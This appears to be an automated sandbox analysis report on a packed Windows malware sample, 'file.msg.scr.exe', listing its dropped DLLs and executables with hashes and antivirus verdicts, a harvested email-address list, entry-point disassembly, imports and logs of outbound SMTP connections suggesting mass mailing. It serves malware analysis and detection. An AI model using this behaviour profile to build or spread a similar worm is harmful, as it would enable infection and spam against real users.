                                                                  Preview:PK............k..u.7..........Update-KB1500-x86.exe..x...?............Y5...D..j.$D......I.@..*&......fs....j.Vk?..U....I..A..h...@@...Q...f.Mv..i...^.{.&...g...:s...7M.....<~\zv...}.-....&..7.v....&.Wv{y..p`.M}...K_|..w..;.q.....o....?.p....I..=..6>..CL>....ACK...?..P..A.5...>..|N.e.. "..W_..-..R$..Ke(..R..`.?....6..Fi..v.)....~..{.|O..).=..........S.{.|O..).=...O....Q......t.......Z...}....;mU.gU....T.5=aw`.........1>......?.c^..._...-..sp...c.\...N.(7..l+RL......_.....t..]..4{..?F.J.o.[..ZQ3..#F.6..hm..M.]....w....2..G...._y.....*O.*...(.[..ET{.w...8.....eux.E.6m.3I.sr..}S..e..f....1x..&M.....&......C0...M5...J........f...GJO.J.F......G..Z...t.....8.W.wp.3U<...h6i......Z...($..S.-........,..H..Dw.SkT........i0..@..*...X....`..X....L\.+..fc...m.......(.......$........(... g.Ak...g...+.R....4.0O|.b....I%m.q9.f9.r..|...7.gQaAr.....&..C..js.fmsB.w.6...h{F.......w..F../.g..Z.<o.J#./.z....|NK../..^....<.m.;0..D}..5<..R..g....6Bl...}.....
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1720
                                                                  Entropy (8bit):2.9443214183274753
                                                                  Encrypted:false
                                                                  SSDEEP:24:PEAoPiVaynbXzfwGDmRfN44EKtZHtvApY4msstHt5hstMDMH:L1xmEKbCsheX
                                                                  MD5:DAF6904E09A281426953488E6F928E38
                                                                  SHA1:F7393E365155A5766387CE4C001853705597B41D
                                                                  SHA-256:571779D9E292690080C85B71DBCE49ADF705F4365B633A310470DE39B5DD3EC5
                                                                  SHA-512:B2F2B42A0A85C2BC268A139E841842C93E7EE23F9576D41E91C87AD496BB7049A206DCFFBDB37AE989EA60622491C4314DBCD937CBBDF748EFEB4C1A57958FEF
                                                                  Malicious:false
                                                                  Preview:m@msn.com...............................a_e@msn.com.............................1@msn.com...............................q@msn.com...............................b_xyz@msn.com...........................cq_yoyo@msn.com.........................mak@aol.com.............................wagnerkd@wxyz.com.......................z_y@quatro.br...........................fa@animo.br.............................e_p@pirajui.br..........................y_karaoke@musical.com.br................pedro_xy@contoso.com.br.................will_k@xyz.com..........................an@xyz.com.br...........................ruy@contoso.com.pt......................y_z@x.com.pt............................katy_x@contoso.com.pt...................kelly@contoso.com.pt....................m_kywx@kywx.com.pt......................malgosia_lv4@aaw.pl.....................adad_1976@griepp.pl.....................vojtek_657@oopp.pl......................aqv_968@wewew.pl........................adavex_467@riekk.pl.....................
                                                                  Process:C:\Users\user\Desktop\file.msg.scr.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):63069
                                                                  Entropy (8bit):6.642470375761558
                                                                  Encrypted:false
                                                                  SSDEEP:1536:36xA6fx7GwbzrhAF9NuCPusA5n5/lt/9/Y06l+veW5NK:n6VGwbzrU/uCPolNP/9C+veWrK
                                                                  MD5:815DF5397E724F17E251D3C5D9B59F34
                                                                  SHA1:D26AB6063CAEA15050CFBF618109873854847118
                                                                  SHA-256:B0B3D443D410716CBFA04AC65106CE8377B56B1B01391396B1D41B54FA72ECD3
                                                                  SHA-512:75C9D32F9E952FF806E5C789A12EF3E8B6E252FDB6499AAAED8C5F1968E2D24CBA5FF1DDE81EFFC94E5F2A50B877941675DED86556EC5E61323B66A0902357F0
                                                                  Malicious:true
                                                                  Preview:.skMha~D>C2C }K}!3&]/..86)=XZS~h6fshg.ik|`X)TZxN#WOOz@?wo!:gzKgt71kT@B=HupM9+4V9Kad2Wl(W6Zc2qRjr?ku1A`.6,<aPlRSNzr11NE3JfnGI7Jo|nPy3kt^`..slRcp.JW-rlolBS/*[z>V8viFU64\$Q?,b84hj;(C..Bn^B.>o,lZRr3oh#3i~..Dg3@#`}uuzXINumg>D.2!)(B~_q.QCiUfu=.jgECfEK]=5e3Yu.BT. ._#&K&x"+4_D2SFH++FnOTFBc>zhT0jGySUp.D\*.g9~gwhdp3V/-*ns{y$LRY*.Wulya))u96(U"AkK[.[6jEb!ZHtU%1LprD6]gG;5.ur.&zp-.UA9H)p;8w!pxa).EIj(+%#PH}.6.yB49{S=#a|T.f3v=.a0;E$p<Xn7p+?LS%V[>"39.~M'.,R/B,8`mi_g,wec,-0VO- HU8\TQA={)Pp=d0<+O.?-iM4L%%Y&Y{X#}XcE}Vm}5iq]H1D_S^YE9IY-<[I^.8ng0@!OC\en~ ?H4yULR(M.GX.l.L)w1+~-oxPr0bM>n4(PT'qj\O}7wbJA0dBb_=,ME)RlUWn03r.jI,l`B1?fqb^7|q..{a_vYQ^00l{U3$9FePH`L1q.z^$,>TO:15,#Tuo51.+N=Thxg1EAE2,1;ED2K'h+.Gn{}dV3-/Ic~d$].kNn"N4=E>pzVM{$z`|HhJ=L\vJ+.|n`FM ba-.:dFzWK`ZPHtBEfRz5[S8odPMO4zaPYl<cPzHkscWM!`h,!MzE`UM\P#mN#e[1+:vE1DJk.Ty?U7f. {H#yO_h9%NYY(i)3.X9fs)cDz.fDCMr&1pQ<I;0.PGZQ71LD.Cd)W$ iKtf(5U$@ep]NAhv)Nfc|Yr;C{^YQdn0}]"/@}t.{HCnQ"fu&;bU6FNc:d'dx`"3-8ZCHnE3(lf_4?.G.E>poF_:PajP~[C2z<KB>hWqHLJ|I^>.+"o^9g/q(jf)<.3
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):28672
                                                                  Entropy (8bit):3.954945363563141
                                                                  Encrypted:false
                                                                  SSDEEP:384:6cUYkTFUBS5rCyg4XnAeeyi+XwdeZgSIANmvsV:6rJTR5RXAn+Xwde2SgS
                                                                  MD5:7D405426D1269886B6E5A9C2F5AB3D0D
                                                                  SHA1:E08EB10BA21788339C29012B8BCDCDE19ADA9C36
                                                                  SHA-256:EF7E96EF6888779E7933A50634EF3A549551B169A47D2BE349BC51C42AA20D89
                                                                  SHA-512:950E49DD3696C3D16F4F64DD8716C24837EC2B7DB4A4BF6E76AC640193E4C748EE4153F692D9AE6C4FF55B433EAFC7A3870A385C191518147926370A94BEFCA5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q..0...0...0...8.0..*8.0...0...0...<.0...<..0...<...0..Rich.0..........................PE..L....D E...........!.....@... ...............P...............................p...............................................D..(............................`..(....................................................................................text... 5.......@.................. ..`.data........P.......P..............@....reloc..L....`.......`..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):20480
                                                                  Entropy (8bit):4.228079937892066
                                                                  Encrypted:false
                                                                  SSDEEP:192:Fl3ZPq9/F2YvlLnXDYN11YytrfBtZiJEb2O+uXZzoe6oEQ:b1qFFBbTSYy5RiJkWwZzo5
                                                                  MD5:B24AB6D11D6C5EDF242C8448B2E6054A
                                                                  SHA1:CE74EB0F0B5A6BC02EE40E40CA366D522B950DE4
                                                                  SHA-256:E1DE14BDCCCD532FB682AD253151021E56615CC86FD716F638CB6A3F4164F3EC
                                                                  SHA-512:72BBBE1BA406B4371D3291907B17228CAC42DCC1EBAC00BDD84C04E66482AB5E33D5146FE211AD58310DFA4FA343F9518F43EE65F9ECAC2CC6D6B80CB031BD60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................n..............................................Rich....................PE..L....D E...........!.....0... ......`........@...............................`.......................................8..i....8..(............................P.......................................................................................text...Y).......0.................. ..`.data...]....@......................@....reloc.......P.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8192
                                                                  Entropy (8bit):5.606307481561592
                                                                  Encrypted:false
                                                                  SSDEEP:192:Q8mKp+1Rn9Gy25CdalzqKRfPy1dW93ne:QhR1XG/5CwzCS8
                                                                  MD5:53D0FF71BEC705351C27389F2A867843
                                                                  SHA1:9F92B05AE22F3148E67639BEC3AA7F15BA61E495
                                                                  SHA-256:E02CB24FBB6CDF0F7181D0071A1FE06A95B924469F44C6ECD67D26097408D0B9
                                                                  SHA-512:FAA5D93D77964BA16421BDAFD2B45925B9A6DC557CA04437EB42B2EE01AD5399DF2370DD1900A2BC3383FF3DA908D2861D29E3748342B7AB5C004534D2C8935F
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: SUSP_Imphash_Mar23_3, Description: Detects imphash often found in malware samples (Maximum 0,25% hits with search for \'imphash:x p:0\' on Virustotal) = 99,75% hits, Source: C:\Windows\SysWOW64\e1.dll, Author: Arnim Rupp (https://github.com/ruppde)
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.E.a.+.a.+.a.+...v.b.+.a.*.c.+.d.K.`.+.d.t.c.+.d.q.`.+.Richa.+.................PE..L...}D E...........!................U........0...............................P...............................................&..(............................@.......................................................................................text............................... ..`.data........0......................@....reloc..H....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):4.945864297139177
                                                                  Encrypted:false
                                                                  SSDEEP:96:fpLp7x39pA7kJpQwea/cXMZnvUhvcu9fPciarvscBITvTmO111tjc1xoEhqhNJLX:fyWpQw2qv0BfP+Bi111taoUsL+ud81I
                                                                  MD5:02DDF51A3CDE4BADE470C7C03C4545E7
                                                                  SHA1:C53BD0A77C3A572CF6E9E99F08F919A640299593
                                                                  SHA-256:9389FCFAB988A15FCD18D1ABCBBEA5E7EC4DA47E273E21EA1D41818C64B94F2C
                                                                  SHA-512:48B4E6C21313222B1E6011A8F05935DC1C1E3721317F8073565FE769EB0B1F9CE1A5A327D51856F6FAEF72787B27DB9CCC83A6A634727EAF238245D3B1214D87
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: SUSP_Imphash_Mar23_3, Description: Detects imphash often found in malware samples (Maximum 0,25% hits with search for \'imphash:x p:0\' on Virustotal) = 99,75% hits, Source: C:\Windows\SysWOW64\nwprmp4s.exe, Author: Arnim Rupp (https://github.com/ruppde)
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 78%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n...3...n...o...n...1...n.......n...4...n.Rich..n.................PE..L....D E................. ...................0....@..........................@..................................................(....................................................................................................................text...T........ .................. ..`.data...r....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1572864
                                                                  Entropy (8bit):4.3139108916920295
                                                                  Encrypted:false
                                                                  SSDEEP:12288:Ar5H8WUzIaQhLjDQyd9E9lyH4rWG8GD4NE4U62ul43VScahZ2S:05H8WUzIaQ1jDQpq4H
                                                                  MD5:094521B951B122AE766D0A3D6F0848B9
                                                                  SHA1:9F9BF28FCDD4554DD3FA8B20A3683B55FCD9F30B
                                                                  SHA-256:07CFA4DC5FA715A284B6F66B8AD40A09D6CAE30B231E0E20AAE04A6B328686A5
                                                                  SHA-512:A863E50A7038BE338E1043C7E6805A8CC89CBB647D18EB3CE54D849DEFCDE22F888B5D3AFDE8582149088FC1C2807C469AD1D2F4743EC3DA6C3381999088ABC9
                                                                  Malicious:false
                                                                  Preview:regfQ...Q...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..?...................................................................................................................................................................................................................................................................................................................................................6.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):4.2101840580013
                                                                  Encrypted:false
                                                                  SSDEEP:768:pHl/bCQiFUz/XgAeeDzegNYtj/HaIsoSw8aMiyqf+WwsfWkchNYd+S:LMyxhDqdY
                                                                  MD5:63A062AD0E5A8DD12E8B33D6F124321B
                                                                  SHA1:7B928FB2F2272D16713E850AFA159F83BBD83AD2
                                                                  SHA-256:FD69C1A2652F2A60E052BAB6227657EB72F878F7D013DFD8B19A2813B7ABA78F
                                                                  SHA-512:6837EC0FC79EAE6BF2298FF6675F75E44D120E1B8B88EFD6A6B3806147303EC2776B48B1543215D466B99BF04150C1D8A182FA0DE3C58DDAD46750003975F0F9
                                                                  Malicious:false
                                                                  Preview:regfP...P...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..?...................................................................................................................................................................................................................................................................................................................................................6.HvLE.~......P.... ......u.gP..A]Y.....7............................................. ..hbin................p.\..,..........nk,.q>B..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .q>B......... ........................... .......Z.......................Root........lf......Root....nk .q>B..................................... ...............*...............DeviceCensus.......................vk..................WritePer
                                                                  Process:C:\Windows\serv.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):7680
                                                                  Entropy (8bit):5.07828909596086
                                                                  Encrypted:false
                                                                  SSDEEP:192:VgDu7Z9QTHreZfUFmxhErERC/b9xIyZt:Vgi7ITU2msCCRbZ
                                                                  MD5:8F1E54E6F9B12FF41298FA92C33F4F02
                                                                  SHA1:0C028668D744664F50F3AD38112FD5337F9921A4
                                                                  SHA-256:543BB9C3EC687F4D391CE9C179B92510FCAADADFE03C809D0D6DFEC387753569
                                                                  SHA-512:8FC0B79526AFC8CE1B4572F1C908FAE3BAD16D8EC06660C9996D02E33925DA58CDF77742A3F3731564AED9731B23EDB4751C9001BA7E27104EC58545259EF404
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 84%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L...zD E...........!.........................0...............................P..........................................;...X...(............................@.......................................................................................text............................... ..`.data........0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\file.msg.scr.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):520196
                                                                  Entropy (8bit):6.561025946535229
                                                                  Encrypted:false
                                                                  SSDEEP:12288:gYQZsuW9geRWQmkt5nZsCRUTV5nhsf8r1J3OIh8W:gYQZsuW9geETkPZstTV5na8RJ3zhx
                                                                  MD5:6B7ED3ABDD8484B313948BA83FDE717F
                                                                  SHA1:2318E1D65CEF538F1CF88E2235A5DD350FF40449
                                                                  SHA-256:EEE33ED66C2E88E414A5887043DB18EDAFA2FEF889882D751F0448ED360EFC44
                                                                  SHA-512:A8C063F22768BDE6E0CF6C510867C6EB3B3ADD47AC57B920D44F94485B830089F5318D31D960239C5F5F7F963496D5481F7C1EF4B2291C01ED01D20A86F24C18
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                  Preview:MZKERNEL32.DLL..LoadLibraryA....GetProcAddress...Z..ByDwing@...PE..L......................).....0......o,............@.............................................................................<....@...]...........................................................................................................Upack...0.......0..................`....rsrc........@.......@..............`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.561025946535229
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.98%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  File name:file.msg.scr.exe
                                                                  File size:520196
                                                                  MD5:6b7ed3abdd8484b313948ba83fde717f
                                                                  SHA1:2318e1d65cef538f1cf88e2235a5dd350ff40449
                                                                  SHA256:eee33ed66c2e88e414a5887043db18edafa2fef889882d751f0448ed360efc44
                                                                  SHA512:a8c063f22768bde6e0cf6c510867c6eb3b3add47ac57b920d44f94485b830089f5318d31d960239c5f5f7f963496d5481f7c1ef4b2291c01ed01d20a86f24c18
                                                                  SSDEEP:12288:gYQZsuW9geRWQmkt5nZsCRUTV5nhsf8r1J3OIh8W:gYQZsuW9geETkPZstTV5na8RJ3zhx
                                                                  TLSH:71B44A14EE5DD0B1E54B087D076A6A957BA05E7D836856D38F403E6BA2330C2FC3BD4A
                                                                  File Content Preview:MZKERNEL32.DLL..LoadLibraryA....GetProcAddress....Z..ByDwing@...PE..L......................).....0......o,............@.............................................................................<....@...].................................................
                                                                  Icon Hash:d5c2d29ac2c2f209
                                                                  Entrypoint:0x422c6f
                                                                  Entrypoint Section:.Upack
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:1d1ca12745771ba3c77da58435c9e56a
                                                                  Instruction
                                                                  push 00000060h
                                                                  push 004303A8h
                                                                  call 00007F166CCE1896h
                                                                  mov edi, 00000094h
                                                                  mov eax, edi
                                                                  call 00007F166CCDFF7Eh
                                                                  mov dword ptr [ebp-18h], esp
                                                                  mov esi, esp
                                                                  mov dword ptr [esi], edi
                                                                  push esi
                                                                  call dword ptr [00430060h]
                                                                  mov ecx, dword ptr [esi+10h]
                                                                  mov dword ptr [00448268h], ecx
                                                                  mov eax, dword ptr [esi+04h]
                                                                  mov dword ptr [00448274h], eax
                                                                  mov edx, dword ptr [esi+08h]
                                                                  mov dword ptr [00448278h], edx
                                                                  mov esi, dword ptr [esi+0Ch]
                                                                  and esi, 00007FFFh
                                                                  mov dword ptr [0044826Ch], esi
                                                                  cmp ecx, 02h
                                                                  je 00007F166CCE02EEh
                                                                  or esi, 00008000h
                                                                  mov dword ptr [0044826Ch], esi
                                                                  shl eax, 08h
                                                                  add eax, edx
                                                                  mov dword ptr [00448270h], eax
                                                                  xor esi, esi
                                                                  push esi
                                                                  mov edi, dword ptr [00430054h]
                                                                  call edi
                                                                  cmp word ptr [eax], 5A4Dh
                                                                  jne 00007F166CCE0301h
                                                                  mov ecx, dword ptr [eax+3Ch]
                                                                  add ecx, eax
                                                                  cmp dword ptr [ecx], 00004550h
                                                                  jne 00007F166CCE02F4h
                                                                  movzx eax, word ptr [ecx+18h]
                                                                  cmp eax, 0000010Bh
                                                                  je 00007F166CCE0301h
                                                                  cmp eax, 0000020Bh
                                                                  je 00007F166CCE02E7h
                                                                  mov dword ptr [ebp-1Ch], esi
                                                                  jmp 00007F166CCE0309h
                                                                  cmp dword ptr [ecx+00000084h], 0Eh
                                                                  jbe 00007F166CCE02D4h
                                                                  xor eax, eax
                                                                  cmp dword ptr [ecx+000000F8h], esi
                                                                  jmp 00007F166CCE02F0h
                                                                  cmp dword ptr [ecx+74h], 0Eh
                                                                  jbe 00007F166CCE02C4h
                                                                  xor eax, eax
                                                                  cmp dword ptr [ecx+000000E8h], esi
                                                                  setne al
                                                                  mov dword ptr [ebp-1Ch], eax
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7e0000x3c.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x5de6.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .Upack0x10000x530000x53000False0.4306317065135542data6.375705515947977IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x540000x2b0000x2b000False0.7129190134447675data6.7755101512441005IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x542660x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States
                                                                  RT_ICON0x5454e0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States
                                                                  RT_ICON0x546760xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States
                                                                  RT_ICON0x5551e0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States
                                                                  RT_ICON0x55dc60x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States
                                                                  RT_ICON0x5632e0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States
                                                                  RT_ICON0x588d60x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States
                                                                  RT_ICON0x5997e0x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States
                                                                  RT_GROUP_ICON0x541f00x76dataEnglishUnited States
                                                                  DLLImport
                                                                  KERNEL32.DLLMapViewOfFile, lstrcmpA, GetLastError, lstrcatA, lstrcpyA, GetTickCount, lstrcmpiA, GetLocalTime, Sleep, WaitForSingleObject, ReleaseMutex, LoadLibraryA, GetSystemDirectoryA, lstrlenA, GetTimeZoneInformation, GetProcAddress, RtlUnwind, RaiseException, HeapFree, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersionExA, HeapAlloc, TlsAlloc, SetLastError, GetCurrentThreadId, TlsFree, TlsSetValue, TlsGetValue, SetUnhandledExceptionFilter, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, IsBadWritePtr, ExitProcess, TerminateProcess, GetCurrentProcess, HeapSize, ReadFile, CloseHandle, WriteFile, GetStdHandle, GetModuleFileNameA, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, IsBadReadPtr, IsBadCodePtr, GetACP, GetOEMCP, GetCPInfo, InitializeCriticalSection, InterlockedExchange, VirtualQuery, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, GetLocaleInfoA, SetFilePointer, SetStdHandle, FlushFileBuffers, CreateFileA, LCMapStringA, LCMapStringW, VirtualProtect, GetSystemInfo, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetEndOfFile
                                                                  ADVAPI32.DLLAllocateAndInitializeSid
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 29, 2023 12:08:56.577280998 CEST4969425192.168.2.467.195.204.79
                                                                  May 29, 2023 12:08:56.688435078 CEST254969467.195.204.79192.168.2.4
                                                                  May 29, 2023 12:08:56.691210985 CEST4969425192.168.2.467.195.204.79
                                                                  May 29, 2023 12:08:56.701294899 CEST4969425192.168.2.467.195.204.79
                                                                  May 29, 2023 12:08:56.814280987 CEST254969467.195.204.79192.168.2.4
                                                                  May 29, 2023 12:08:56.892046928 CEST254969467.195.204.79192.168.2.4
                                                                  May 29, 2023 12:08:56.892127991 CEST254969467.195.204.79192.168.2.4
                                                                  May 29, 2023 12:08:56.892271996 CEST4969425192.168.2.467.195.204.79
                                                                  May 29, 2023 12:08:56.892271996 CEST4969425192.168.2.467.195.204.79
                                                                  May 29, 2023 12:08:57.027018070 CEST4969525192.168.2.4142.250.27.26
                                                                  May 29, 2023 12:08:57.055668116 CEST2549695142.250.27.26192.168.2.4
                                                                  May 29, 2023 12:08:57.055819035 CEST4969525192.168.2.4142.250.27.26
                                                                  May 29, 2023 12:08:57.056052923 CEST4969525192.168.2.4142.250.27.26
                                                                  May 29, 2023 12:08:57.085932970 CEST2549695142.250.27.26192.168.2.4
                                                                  May 29, 2023 12:08:57.097206116 CEST2549695142.250.27.26192.168.2.4
                                                                  May 29, 2023 12:08:57.100042105 CEST4969525192.168.2.4142.250.27.26
                                                                  May 29, 2023 12:08:57.134284019 CEST4969625192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:08:57.160191059 CEST2549696104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:08:57.160345078 CEST4969625192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:08:57.166348934 CEST4969625192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:08:57.187882900 CEST2549696104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:08:57.187975883 CEST4969625192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:08:57.192054033 CEST2549696104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:08:57.192157984 CEST4969625192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:08:57.192643881 CEST2549696104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:08:57.192696095 CEST4969625192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:09:07.120112896 CEST4969725192.168.2.467.195.204.74
                                                                  May 29, 2023 12:09:07.231141090 CEST254969767.195.204.74192.168.2.4
                                                                  May 29, 2023 12:09:07.234003067 CEST4969725192.168.2.467.195.204.74
                                                                  May 29, 2023 12:09:07.235549927 CEST4969725192.168.2.467.195.204.74
                                                                  May 29, 2023 12:09:07.348445892 CEST254969767.195.204.74192.168.2.4
                                                                  May 29, 2023 12:09:07.530505896 CEST4969825192.168.2.4142.250.150.26
                                                                  May 29, 2023 12:09:07.537208080 CEST254969767.195.204.74192.168.2.4
                                                                  May 29, 2023 12:09:07.537247896 CEST254969767.195.204.74192.168.2.4
                                                                  May 29, 2023 12:09:07.537481070 CEST4969725192.168.2.467.195.204.74
                                                                  May 29, 2023 12:09:07.537858963 CEST4969725192.168.2.467.195.204.74
                                                                  May 29, 2023 12:09:07.580784082 CEST2549698142.250.150.26192.168.2.4
                                                                  May 29, 2023 12:09:07.581012964 CEST4969825192.168.2.4142.250.150.26
                                                                  May 29, 2023 12:09:07.581238985 CEST4969825192.168.2.4142.250.150.26
                                                                  May 29, 2023 12:09:07.631963015 CEST2549698142.250.150.26192.168.2.4
                                                                  May 29, 2023 12:09:07.632051945 CEST4969825192.168.2.4142.250.150.26
                                                                  May 29, 2023 12:09:07.632909060 CEST4969925192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:09:07.658512115 CEST2549699104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:09:07.658665895 CEST4969925192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:09:07.662638903 CEST4969925192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:09:07.685729980 CEST2549699104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:09:07.685832024 CEST4969925192.168.2.4104.47.18.161
                                                                  May 29, 2023 12:09:07.688389063 CEST2549699104.47.18.161192.168.2.4
                                                                  May 29, 2023 12:09:07.688512087 CEST4969925192.168.2.4104.47.18.161
